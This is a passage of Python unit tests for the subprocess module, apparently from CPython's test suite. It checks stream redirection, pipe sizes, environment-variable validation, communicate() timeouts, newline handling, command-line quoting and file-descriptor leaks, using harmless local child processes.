os.lseek(d, 0, 0)
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.exit(sys.stdin.read() == "pear")'],
stdin=d)
p.wait()
self.assertEqual(p.returncode, 1)
def test_stdin_fileobj(self):
# stdin is set to open file object
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
tf.write(b"pear")
tf.seek(0)
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.exit(sys.stdin.read() == "pear")'],
stdin=tf)
p.wait()
self.assertEqual(p.returncode, 1)
def test_stdout_pipe(self):
# stdout redirection
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stdout.write("orange")'],
stdout=subprocess.PIPE)
with p:
self.assertEqual(p.stdout.read(), b"orange")
def test_stdout_filedes(self):
# stdout is set to open file descriptor
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
d = tf.fileno()
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stdout.write("orange")'],
stdout=d)
p.wait()
os.lseek(d, 0, 0)
self.assertEqual(os.read(d, 1024), b"orange")
def test_stdout_fileobj(self):
# stdout is set to open file object
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stdout.write("orange")'],
stdout=tf)
p.wait()
tf.seek(0)
self.assertEqual(tf.read(), b"orange")
def test_stderr_pipe(self):
# stderr redirection
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stderr.write("strawberry")'],
stderr=subprocess.PIPE)
with p:
self.assertEqual(p.stderr.read(), b"strawberry")
def test_stderr_filedes(self):
# stderr is set to open file descriptor
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
d = tf.fileno()
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stderr.write("strawberry")'],
stderr=d)
p.wait()
os.lseek(d, 0, 0)
self.assertEqual(os.read(d, 1024), b"strawberry")
def test_stderr_fileobj(self):
# stderr is set to open file object
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stderr.write("strawberry")'],
stderr=tf)
p.wait()
tf.seek(0)
self.assertEqual(tf.read(), b"strawberry")
def test_stderr_redirect_with_no_stdout_redirect(self):
# test stderr=STDOUT while stdout=None (not set)
# - grandchild prints to stderr
# - child redirects grandchild's stderr to its stdout
# - the parent should get grandchild's stderr in child's stdout
p = subprocess.Popen([sys.executable, "-c",
'import sys, subprocess;'
'rc = subprocess.call([sys.executable, "-c",'
' "import sys;"'
' "sys.stderr.write(\'42\')"],'
' stderr=subprocess.STDOUT);'
'sys.exit(rc)'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
#NOTE: stdout should get stderr from grandchild
self.assertEqual(stdout, b'42')
self.assertEqual(stderr, b'') # should be empty
self.assertEqual(p.returncode, 0)
def test_stdout_stderr_pipe(self):
# capture stdout and stderr to the same pipe
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdout.write("apple");'
'sys.stdout.flush();'
'sys.stderr.write("orange")'],
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
with p:
self.assertEqual(p.stdout.read(), b"appleorange")
def test_stdout_stderr_file(self):
# capture stdout and stderr to the same open file
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdout.write("apple");'
'sys.stdout.flush();'
'sys.stderr.write("orange")'],
stdout=tf,
stderr=tf)
p.wait()
tf.seek(0)
self.assertEqual(tf.read(), b"appleorange")
def test_stdout_filedes_of_stdout(self):
# stdout is set to 1 (#1531862).
# To avoid printing the text on stdout, we do something similar to
# test_stdout_none (see above). The parent subprocess calls the child
# subprocess passing stdout=1, and this test uses stdout=PIPE in
# order to capture and check the output of the parent. See #11963.
code = ('import sys, subprocess; '
'rc = subprocess.call([sys.executable, "-c", '
' "import os, sys; sys.exit(os.write(sys.stdout.fileno(), '
'b\'test with stdout=1\'))"], stdout=1); '
'assert rc == 18')
p = subprocess.Popen([sys.executable, "-c", code],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
out, err = p.communicate()
self.assertEqual(p.returncode, 0, err)
self.assertEqual(out.rstrip(), b'test with stdout=1')
def test_stdout_devnull(self):
p = subprocess.Popen([sys.executable, "-c",
'for i in range(10240):'
'print("x" * 1024)'],
stdout=subprocess.DEVNULL)
p.wait()
self.assertEqual(p.stdout, None)
def test_stderr_devnull(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys\n'
'for i in range(10240):'
'sys.stderr.write("x" * 1024)'],
stderr=subprocess.DEVNULL)
p.wait()
self.assertEqual(p.stderr, None)
def test_stdin_devnull(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdin.read(1)'],
stdin=subprocess.DEVNULL)
p.wait()
self.assertEqual(p.stdin, None)
@unittest.skipUnless(fcntl and hasattr(fcntl, 'F_GETPIPE_SZ'),
'fcntl.F_GETPIPE_SZ required for test.')
def test_pipesizes(self):
test_pipe_r, test_pipe_w = os.pipe()
try:
# Get the default pipesize with F_GETPIPE_SZ
pipesize_default = fcntl.fcntl(test_pipe_w, fcntl.F_GETPIPE_SZ)
finally:
os.close(test_pipe_r)
os.close(test_pipe_w)
pipesize = pipesize_default // 2
if pipesize < 512: # the POSIX minimum
            raise unittest.SkipTest(
'default pipesize too small to perform test.')
p = subprocess.Popen(
[sys.executable, "-c",
'import sys; sys.stdin.read(); sys.stdout.write("out"); '
'sys.stderr.write("error!")'],
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, pipesize=pipesize)
try:
for fifo in [p.stdin, p.stdout, p.stderr]:
self.assertEqual(
fcntl.fcntl(fifo.fileno(), fcntl.F_GETPIPE_SZ),
pipesize)
# Windows pipe size can be acquired via GetNamedPipeInfoFunction
# https://docs.microsoft.com/en-us/windows/win32/api/namedpipeapi/nf-namedpipeapi-getnamedpipeinfo
# However, this function is not yet in _winapi.
p.stdin.write(b"pear")
p.stdin.close()
finally:
p.kill()
p.wait()
@unittest.skipUnless(fcntl and hasattr(fcntl, 'F_GETPIPE_SZ'),
'fcntl.F_GETPIPE_SZ required for test.')
def test_pipesize_default(self):
p = subprocess.Popen(
[sys.executable, "-c",
'import sys; sys.stdin.read(); sys.stdout.write("out"); '
'sys.stderr.write("error!")'],
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, pipesize=-1)
try:
fp_r, fp_w = os.pipe()
try:
default_pipesize = fcntl.fcntl(fp_w, fcntl.F_GETPIPE_SZ)
for fifo in [p.stdin, p.stdout, p.stderr]:
self.assertEqual(
fcntl.fcntl(fifo.fileno(), fcntl.F_GETPIPE_SZ),
default_pipesize)
finally:
os.close(fp_r)
os.close(fp_w)
# On other platforms we cannot test the pipe size (yet). But above
# code using pipesize=-1 should not crash.
p.stdin.close()
finally:
p.kill()
p.wait()
def test_env(self):
newenv = os.environ.copy()
newenv["FRUIT"] = "orange"
with subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stdout.write(os.getenv("FRUIT"))'],
stdout=subprocess.PIPE,
env=newenv) as p:
stdout, stderr = p.communicate()
self.assertEqual(stdout, b"orange")
# Windows requires at least the SYSTEMROOT environment variable to start
# Python
@unittest.skipIf(sys.platform == 'win32',
'cannot test an empty env on Windows')
@unittest.skipIf(sysconfig.get_config_var('Py_ENABLE_SHARED') == 1,
'The Python shared library cannot be loaded '
'with an empty environment.')
def test_empty_env(self):
"""Verify that env={} is as empty as possible."""
def is_env_var_to_ignore(n):
"""Determine if an environment variable is under our control."""
# This excludes some __CF_* and VERSIONER_* keys MacOS insists
# on adding even when the environment in exec is empty.
# Gentoo sandboxes also force LD_PRELOAD and SANDBOX_* to exist.
return ('VERSIONER' in n or '__CF' in n or # MacOS
n == 'LD_PRELOAD' or n.startswith('SANDBOX') or # Gentoo
n == 'LC_CTYPE') # Locale coercion triggered
with subprocess.Popen([sys.executable, "-c",
'import os; print(list(os.environ.keys()))'],
stdout=subprocess.PIPE, env={}) as p:
stdout, stderr = p.communicate()
child_env_names = eval(stdout.strip())
self.assertIsInstance(child_env_names, list)
child_env_names = [k for k in child_env_names
if not is_env_var_to_ignore(k)]
self.assertEqual(child_env_names, [])
def test_invalid_cmd(self):
# null character in the command name
cmd = sys.executable + '\0'
with self.assertRaises(ValueError):
subprocess.Popen([cmd, "-c", "pass"])
# null character in the command argument
with self.assertRaises(ValueError):
subprocess.Popen([sys.executable, "-c", "pass#\0"])
def test_invalid_env(self):
# null character in the environment variable name
newenv = os.environ.copy()
newenv["FRUIT\0VEGETABLE"] = "cabbage"
with self.assertRaises(ValueError):
subprocess.Popen(ZERO_RETURN_CMD, env=newenv)
# null character in the environment variable value
newenv = os.environ.copy()
newenv["FRUIT"] = "orange\0VEGETABLE=cabbage"
with self.assertRaises(ValueError):
subprocess.Popen(ZERO_RETURN_CMD, env=newenv)
# equal character in the environment variable name
newenv = os.environ.copy()
newenv["FRUIT=ORANGE"] = "lemon"
with self.assertRaises(ValueError):
subprocess.Popen(ZERO_RETURN_CMD, env=newenv)
# equal character in the environment variable value
newenv = os.environ.copy()
newenv["FRUIT"] = "orange=lemon"
with subprocess.Popen([sys.executable, "-c",
'import sys, os;'
'sys.stdout.write(os.getenv("FRUIT"))'],
stdout=subprocess.PIPE,
env=newenv) as p:
stdout, stderr = p.communicate()
self.assertEqual(stdout, b"orange=lemon")
def test_communicate_stdin(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.exit(sys.stdin.read() == "pear")'],
stdin=subprocess.PIPE)
p.communicate(b"pear")
self.assertEqual(p.returncode, 1)
def test_communicate_stdout(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stdout.write("pineapple")'],
stdout=subprocess.PIPE)
(stdout, stderr) = p.communicate()
self.assertEqual(stdout, b"pineapple")
self.assertEqual(stderr, None)
def test_communicate_stderr(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stderr.write("pineapple")'],
stderr=subprocess.PIPE)
(stdout, stderr) = p.communicate()
self.assertEqual(stdout, None)
self.assertEqual(stderr, b"pineapple")
def test_communicate(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stderr.write("pineapple");'
'sys.stdout.write(sys.stdin.read())'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
(stdout, stderr) = p.communicate(b"banana")
self.assertEqual(stdout, b"banana")
self.assertEqual(stderr, b"pineapple")
def test_communicate_timeout(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys,os,time;'
'sys.stderr.write("pineapple\\n");'
'time.sleep(1);'
'sys.stderr.write("pear\\n");'
'sys.stdout.write(sys.stdin.read())'],
universal_newlines=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.assertRaises(subprocess.TimeoutExpired, p.communicate, "banana",
timeout=0.3)
# Make sure we can keep waiting for it, and that we get the whole output
# after it completes.
(stdout, stderr) = p.communicate()
self.assertEqual(stdout, "banana")
self.assertEqual(stderr.encode(), b"pineapple\npear\n")
def test_communicate_timeout_large_output(self):
# Test an expiring timeout while the child is outputting lots of data.
p = subprocess.Popen([sys.executable, "-c",
'import sys,os,time;'
'sys.stdout.write("a" * (64 * 1024));'
'time.sleep(0.2);'
'sys.stdout.write("a" * (64 * 1024));'
'time.sleep(0.2);'
'sys.stdout.write("a" * (64 * 1024));'
'time.sleep(0.2);'
'sys.stdout.write("a" * (64 * 1024));'],
stdout=subprocess.PIPE)
self.assertRaises(subprocess.TimeoutExpired, p.communicate, timeout=0.4)
(stdout, _) = p.communicate()
self.assertEqual(len(stdout), 4 * 64 * 1024)
# Test for the fd leak reported in http://bugs.python.org/issue2791.
def test_communicate_pipe_fd_leak(self):
for stdin_pipe in (False, True):
for stdout_pipe in (False, True):
for stderr_pipe in (False, True):
options = {}
if stdin_pipe:
options['stdin'] = subprocess.PIPE
if stdout_pipe:
options['stdout'] = subprocess.PIPE
if stderr_pipe:
options['stderr'] = subprocess.PIPE
if not options:
continue
p = subprocess.Popen(ZERO_RETURN_CMD, **options)
p.communicate()
if p.stdin is not None:
self.assertTrue(p.stdin.closed)
if p.stdout is not None:
self.assertTrue(p.stdout.closed)
if p.stderr is not None:
self.assertTrue(p.stderr.closed)
def test_communicate_returns(self):
# communicate() should return None if no redirection is active
p = subprocess.Popen([sys.executable, "-c",
"import sys; sys.exit(47)"])
(stdout, stderr) = p.communicate()
self.assertEqual(stdout, None)
self.assertEqual(stderr, None)
def test_communicate_pipe_buf(self):
# communicate() with writes larger than pipe_buf
# This test will probably deadlock rather than fail, if
# communicate() does not work properly.
x, y = os.pipe()
os.close(x)
os.close(y)
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stdout.write(sys.stdin.read(47));'
'sys.stderr.write("x" * %d);'
'sys.stdout.write(sys.stdin.read())' %
support.PIPE_MAX_SIZE],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
string_to_write = b"a" * support.PIPE_MAX_SIZE
(stdout, stderr) = p.communicate(string_to_write)
self.assertEqual(stdout, string_to_write)
def test_writes_before_communicate(self):
# stdin.write before communicate()
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stdout.write(sys.stdin.read())'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
p.stdin.write(b"banana")
(stdout, stderr) = p.communicate(b"split")
self.assertEqual(stdout, b"bananasplit")
self.assertEqual(stderr, b"")
def test_universal_newlines_and_text(self):
args = [
sys.executable, "-c",
'import sys,os;' + SETBINARY +
'buf = sys.stdout.buffer;'
'buf.write(sys.stdin.readline().encode());'
'buf.flush();'
'buf.write(b"line2\\n");'
'buf.flush();'
'buf.write(sys.stdin.read().encode());'
'buf.flush();'
'buf.write(b"line4\\n");'
'buf.flush();'
'buf.write(b"line5\\r\\n");'
'buf.flush();'
'buf.write(b"line6\\r");'
'buf.flush();'
'buf.write(b"\\nline7");'
'buf.flush();'
'buf.write(b"\\nline8");']
for extra_kwarg in ('universal_newlines', 'text'):
p = subprocess.Popen(args, **{'stdin': subprocess.PIPE,
'stdout': subprocess.PIPE,
extra_kwarg: True})
with p:
p.stdin.write("line1\n")
p.stdin.flush()
self.assertEqual(p.stdout.readline(), "line1\n")
p.stdin.write("line3\n")
p.stdin.close()
self.addCleanup(p.stdout.close)
self.assertEqual(p.stdout.readline(),
"line2\n")
self.assertEqual(p.stdout.read(6),
"line3\n")
self.assertEqual(p.stdout.read(),
"line4\nline5\nline6\nline7\nline8")
def test_universal_newlines_communicate(self):
# universal newlines through communicate()
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;' + SETBINARY +
'buf = sys.stdout.buffer;'
'buf.write(b"line2\\n");'
'buf.flush();'
'buf.write(b"line4\\n");'
'buf.flush();'
'buf.write(b"line5\\r\\n");'
'buf.flush();'
'buf.write(b"line6\\r");'
'buf.flush();'
'buf.write(b"\\nline7");'
'buf.flush();'
'buf.write(b"\\nline8");'],
stderr=subprocess.PIPE,
stdout=subprocess.PIPE,
universal_newlines=1)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
(stdout, stderr) = p.communicate()
self.assertEqual(stdout,
"line2\nline4\nline5\nline6\nline7\nline8")
def test_universal_newlines_communicate_stdin(self):
# universal newlines through communicate(), with only stdin
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;' + SETBINARY + textwrap.dedent('''
s = sys.stdin.readline()
assert s == "line1\\n", repr(s)
s = sys.stdin.read()
assert s == "line3\\n", repr(s)
''')],
stdin=subprocess.PIPE,
universal_newlines=1)
(stdout, stderr) = p.communicate("line1\nline3\n")
self.assertEqual(p.returncode, 0)
def test_universal_newlines_communicate_input_none(self):
# Test communicate(input=None) with universal newlines.
#
# We set stdout to PIPE because, as of this writing, a different
# code path is tested when the number of pipes is zero or one.
p = subprocess.Popen(ZERO_RETURN_CMD,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
universal_newlines=True)
p.communicate()
self.assertEqual(p.returncode, 0)
def test_universal_newlines_communicate_stdin_stdout_stderr(self):
# universal newlines through communicate(), with stdin, stdout, stderr
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;' + SETBINARY + textwrap.dedent('''
s = sys.stdin.buffer.readline()
sys.stdout.buffer.write(s)
sys.stdout.buffer.write(b"line2\\r")
sys.stderr.buffer.write(b"eline2\\n")
s = sys.stdin.buffer.read()
sys.stdout.buffer.write(s)
sys.stdout.buffer.write(b"line4\\n")
sys.stdout.buffer.write(b"line5\\r\\n")
sys.stderr.buffer.write(b"eline6\\r")
sys.stderr.buffer.write(b"eline7\\r\\nz")
''')],
stdin=subprocess.PIPE,
stderr=subprocess.PIPE,
stdout=subprocess.PIPE,
universal_newlines=True)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
(stdout, stderr) = p.communicate("line1\nline3\n")
self.assertEqual(p.returncode, 0)
self.assertEqual("line1\nline2\nline3\nline4\nline5\n", stdout)
# Python debug builds push something like "[42442 refs]\n"
# to stderr at exit of the subprocess.
self.assertTrue(stderr.startswith("eline2\neline6\neline7\n"))
def test_universal_newlines_communicate_encodings(self):
# Check that universal newlines mode works for various encodings,
# in particular for encodings in the UTF-16 and UTF-32 families.
# See issue #15595.
#
# UTF-16 and UTF-32-BE are sufficient to check both with and without
# a BOM, and to cover both the UTF-16 and UTF-32 families.
for encoding in ['utf-16', 'utf-32-be']:
code = ("import sys; "
r"sys.stdout.buffer.write('1\r\n2\r3\n4'.encode('%s'))" %
encoding)
args = [sys.executable, '-c', code]
# We set stdin to be non-None because, as of this writing,
# a different code path is used when the number of pipes is
# zero or one.
popen = subprocess.Popen(args,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
encoding=encoding)
stdout, stderr = popen.communicate(input='')
self.assertEqual(stdout, '1\n2\n3\n4')
def test_communicate_errors(self):
for errors, expected in [
('ignore', ''),
('replace', '\ufffd\ufffd'),
('surrogateescape', '\udc80\udc80'),
('backslashreplace', '\\x80\\x80'),
]:
code = ("import sys; "
r"sys.stdout.buffer.write(b'[\x80\x80]')")
args = [sys.executable, '-c', code]
# We set stdin to be non-None because, as of this writing,
# a different code path is used when the number of pipes is
# zero or one.
popen = subprocess.Popen(args,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
encoding='utf-8',
errors=errors)
stdout, stderr = popen.communicate(input='')
self.assertEqual(stdout, '[{}]'.format(expected))
def test_no_leaking(self):
# Make sure we leak no resources
if not mswindows:
max_handles = 1026 # too much for most UNIX systems
else:
max_handles = 2050 # too much for (at least some) Windows setups
handles = []
tmpdir = tempfile.mkdtemp()
try:
for i in range(max_handles):
try:
tmpfile = os.path.join(tmpdir, os_helper.TESTFN)
handles.append(os.open(tmpfile, os.O_WRONLY|os.O_CREAT))
except OSError as e:
if e.errno != errno.EMFILE:
raise
break
else:
self.skipTest("failed to reach the file descriptor limit "
"(tried %d)" % max_handles)
# Close a couple of them (should be enough for a subprocess)
for i in range(10):
os.close(handles.pop())
# Loop creating some subprocesses. If one of them leaks some fds,
# the next loop iteration will fail by reaching the max fd limit.
for i in range(15):
p = subprocess.Popen([sys.executable, "-c",
"import sys;"
"sys.stdout.write(sys.stdin.read())"],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
data = p.communicate(b"lime")[0]
self.assertEqual(data, b"lime")
finally:
for h in handles:
os.close(h)
shutil.rmtree(tmpdir)
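# Note (editor's addition): list2cmdline() translates an args sequence into a
# command-line string using (roughly) the MS C runtime rules: arguments are
# space-separated, arguments containing spaces or tabs are double-quoted, and
# backslashes are doubled only when they precede a double quote. The cases
# below exercise those rules.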
def test_list2cmdline(self):
self.assertEqual(subprocess.list2cmdline(['a b c', 'd', 'e']),
'"a b c" d e')
self.assertEqual(subprocess.list2cmdline(['ab"c', '\\', 'd']),
'ab\\"c \\ d')
self.assertEqual(subprocess.list2cmdline(['ab"c', ' \\', 'd']),
'ab\\"c " \\\\" d')
self.assertEqual(subprocess.list2cmdline(['a\\\\\\b', 'de fg', 'h']),
'a\\\\\\b "de fg" h')
self.assertEqual(subprocess.list2cmdline(['a\\"b', 'c', 'd']),
'a\\\\\\"b c d')
self.assertEqual(subprocess.list2cmdline(['a\\\\b c', 'd', 'e']),
'"a\\\\b c" d e')
self.assertEqual(subprocess.list2cmdline(['a\\\\b\\ c', 'd', 'e']),
'"a\\\\b\\ c" d e')
self.assertEqual(subprocess.list2cmdline(['ab', '']),
'ab ""')
def test_poll(self):
p = subprocess.Popen([sys.executable, "-c",
"import os; os.read(0, 1)"],
stdin=subprocess.PIPE)
self.addCleanup(p.stdin.close)
self.assertIsNone(p.poll())
os.write(p.stdin.fileno(), b'A')
p.wait()
# Subsequent invocations should just return the returncode
self.assertEqual(p.poll(), 0)
def test_wait(self):
p = subprocess.Popen(ZERO_RETURN_CMD)
self.assertEqual(p.wait(), 0)
# Subsequent invocations should just return the returncode
self.assertEqual(p.wait(), 0)
def test_wait_timeout(self):
p = subprocess.Popen([sys.executable,
"-c", "import time; time.sleep(0.3)"])
with self.assertRaises(subprocess.TimeoutExpired) as c:
p.wait(timeout=0.0001)
self.assertIn("0.0001", str(c.exception)) # For coverage of __str__.
self.assertEqual(p.wait(timeout=support.SHORT_TIMEOUT), 0)
def test_invalid_bufsize(self):
# an invalid type of the bufsize argument should raise
# TypeError.
with self.assertRaises(TypeError):
subprocess.Popen(ZERO_RETURN_CMD, "orange")
def test_bufsize_is_none(self):
# bufsize=None should be the same as bufsize=0.
p = subprocess.Popen(ZERO_RETURN_CMD, None)
self.assertEqual(p.wait(), 0)
# Again with keyword arg
p = subprocess.Popen(ZERO_RETURN_CMD, bufsize=None)
self.assertEqual(p.wait(), 0)
def _test_bufsize_equal_one(self, line, expected, universal_newlines):
# subprocess may deadlock with bufsize=1, see issue #21332
with subprocess.Popen([sys.executable, "-c", "import sys;"
"sys.stdout.write(sys.stdin.readline());"
"sys.stdout.flush()"],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.DEVNULL,
bufsize=1,
universal_newlines=universal_newlines) as p:
p.stdin.write(line) # expect that it flushes the line in text mode
os.close(p.stdin.fileno()) # close it without flushing the buffer
read_line = p.stdout.readline()
with support.SuppressCrashReport():
try:
p.stdin.close()
except OSError:
pass
p.stdin = None
self.assertEqual(p.returncode, 0)
self.assertEqual(read_line, expected)
def test_bufsize_equal_one_text_mode(self):
# line is flushed in text mode with bufsize=1.
# we should get the full line in return
line = "line\n"
self._test_bufsize_equal_one(line, line, universal_newlines=True)
def test_bufsize_equal_one_binary_mode(self):
# line is not flushed in binary mode with bufsize=1.
# we should get empty response
line = b'line' + os.linesep.encode() # assume ascii-based locale
with self.assertWarnsRegex(RuntimeWarning, 'line buffering'):
self._test_bufsize_equal_one(line, b'', universal_newlines=False)
def test_leaking_fds_on_error(self):
# see bug #5179: Popen leaks file descriptors to PIPEs if
# the child fails to execute; this will eventually exhaust
# the maximum number of open fds. 1024 seems a very common
# value for that limit, but Windows has 2048, so we loop
# 1024 times (each call leaked two fds).
for i in range(1024):
with self.assertRaises(NONEXISTING_ERRORS):
subprocess.Popen(NONEXISTING_CMD,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
def test_nonexisting_with_pipes(self):
# bpo-30121: Popen with pipes must properly close the pipes on error.
# Previously, os.close() was called with a Windows handle which is not
# a valid file descriptor.
#
# Run the test in a subprocess to control how the CRT reports errors
# and to get stderr content.
try:
import msvcrt
msvcrt.CrtSetReportMode
except (AttributeError, ImportError):
self.skipTest("need msvcrt.CrtSetReportMode")
code = textwrap.dedent(f"""
import msvcrt
import subprocess
cmd = {NONEXISTING_CMD!r}
for report_type in [msvcrt.CRT_WARN,
msvcrt.CRT_ERROR,
msvcrt.CRT_ASSERT]:
msvcrt.CrtSetReportMode(report_type, msvcrt.CRTDBG_MODE_FILE)
msvcrt.CrtSetReportFile(report_type, msvcrt.CRTDBG_FILE_STDERR)
try:
subprocess.Popen(cmd,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
except OSError:
pass
""")
cmd = [sys.executable, "-c", code]
proc = subprocess.Popen(cmd,
stderr=subprocess.PIPE,
universal_newlines=True)
with proc:
stderr = proc.communicate()[1]
self.assertEqual(stderr, "")
self.assertEqual(proc.returncode, 0)
def test_double_close_on_error(self):
# Issue #18851
fds = []
def open_fds():
for i in range(20):
fds.extend(os.pipe())
time.sleep(0.001)
t = threading.Thread(target=open_fds)
t.start()
try:
with self.assertRaises(EnvironmentError):
subprocess.Popen(NONEXISTING_CMD,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
finally:
t.join()
exc = None
for fd in fds:
# If a double close occurred, some of those fds will
# already have been closed by mistake, and os.close()
# here will raise.
try:
os.close(fd)
except OSError as e:
exc = e
if exc is not None:
raise exc
def test_threadsafe_wait(self):
"""Issue21291: Popen.wait() needs to be threadsafe for returncode."""
proc = subprocess.Popen([sys.executable, '-c',
'import time; time.sleep(12)'])
self.assertEqual(proc.returncode, None)
results = []
def kill_proc_timer_thread():
results.append(('thread-start-poll-result', proc.poll()))
# terminate it from the thread and wait for the result.
proc.kill()
proc.wait()
results.append(('thread-after-kill-and-wait', proc.returncode))
# this wait should be a no-op given the above.
proc.wait()
results.append(('thread-after-second-wait', proc.returncode))
# This is a timing-sensitive test; the failure mode is
# triggered when both the main thread and this thread are in
# the wait() call at once. The delay here is to allow the
# main thread to most likely be blocked in its wait() call.
t = threading.Timer(0.2, kill_proc_timer_thread)
t.start()
if mswindows:
expected_errorcode = 1
else:
# Should be -9 because of the proc.kill() from the thread.
expected_errorcode = -9
# Wait for the process to finish; the thread should kill it
# long before it finishes on its own. Supplying a timeout
# triggers a different code path for better coverage.
proc.wait(timeout=support.SHORT_TIMEOUT)
self.assertEqual(proc.returncode, expected_errorcode,
msg="unexpected result in wait from main thread")
# This should be a no-op with no change in returncode.
proc.wait()
self.assertEqual(proc.returncode, expected_errorcode,
msg="unexpected result in second main wait.")
t.join()
# Ensure that all of the thread results are as expected.
# When a race condition occurs in wait(), the returncode could
# be set by the wrong thread (one that doesn't actually have it),
# leading to an incorrect value.
self.assertEqual([('thread-start-poll-result', None),
('thread-after-kill-and-wait', expected_errorcode),
('thread-after-second-wait', expected_errorcode)],
results)
def test_issue8780(self):
# Ensure that stdout is inherited from the parent
# if stdout=PIPE is not used
code = ';'.join((
'import subprocess, sys',
'retcode = subprocess.call('
"[sys.executable, '-c', 'print(\"Hello World!\")'])",
'assert retcode == 0'))
output = subprocess.check_output([sys.executable, '-c', code])
self.assertTrue(output.startswith(b'Hello World!'), ascii(output))
def test_handles_closed_on_exception(self):
# If CreateProcess exits with an error, ensure the
# duplicate output handles are released
ifhandle, ifname = tempfile.mkstemp()
ofhandle, ofname = tempfile.mkstemp()
efhandle, efname = tempfile.mkstemp()
try:
subprocess.Popen (["*"], stdin=ifhandle, stdout=ofhandle,
stderr=efhandle)
except OSError:
os.close(ifhandle)
os.remove(ifname)
os.close(ofhandle)
os.remove(ofname)
os.close(efhandle)
os.remove(efname)
self.assertFalse(os.path.exists(ifname))
self.assertFalse(os.path.exists(ofname))
self.assertFalse(os.path.exists(efname))
def test_communicate_epipe(self):
# Issue 10963: communicate() should hide EPIPE
p = subprocess.Popen(ZERO_RETURN_CMD,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
p.communicate(b"x" * 2**20)
def test_repr(self):
# Run a command that waits for user input, to check the repr() of
# a Popen object while and after the sub-process runs.
code = 'import sys; input(); sys.exit(57)'
cmd = [sys.executable, '-c', code]
result = "<Popen: returncode: {}"
with subprocess.Popen(
cmd, stdin=subprocess.PIPE, universal_newlines=True) as proc:
self.assertIsNone(proc.returncode)
self.assertTrue(
repr(proc).startswith(result.format(proc.returncode)) and
repr(proc).endswith('>')
)
proc.communicate(input='exit...\n')
proc.wait()
self.assertIsNotNone(proc.returncode)
self.assertTrue(
repr(proc).startswith(result.format(proc.returncode)) and
repr(proc).endswith('>')
)
def test_communicate_epipe_only_stdin(self):
# Issue 10963: communicate() should hide EPIPE
p = subprocess.Popen(ZERO_RETURN_CMD,
stdin=subprocess.PIPE)
self.addCleanup(p.stdin.close)
p.wait()
p.communicate(b"x" * 2**20)
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'),
"Requires signal.SIGUSR1")
@unittest.skipUnless(hasattr(os, 'kill'),
"Requires os.kill")
@unittest.skipUnless(hasattr(os, 'getppid'),
"Requires os.getppid")
def test_communicate_eintr(self):
# Issue #12493: communicate() should handle EINTR
def handler(signum, frame):
pass
old_handler = signal.signal(signal.SIGUSR1, handler)
self.addCleanup(signal.signal, signal.SIGUSR1, old_handler)
args = [sys.executable, "-c",
'import os, signal;'
'os.kill(os.getppid(), signal.SIGUSR1)']
for stream in ('stdout', 'stderr'):
kw = {stream: subprocess.PIPE}
with subprocess.Popen(args, **kw) as process:
# communicate() will be interrupted by SIGUSR1
process.communicate()
# This test is Linux-ish specific for simplicity to at least have
# some coverage. It is not a platform specific bug.
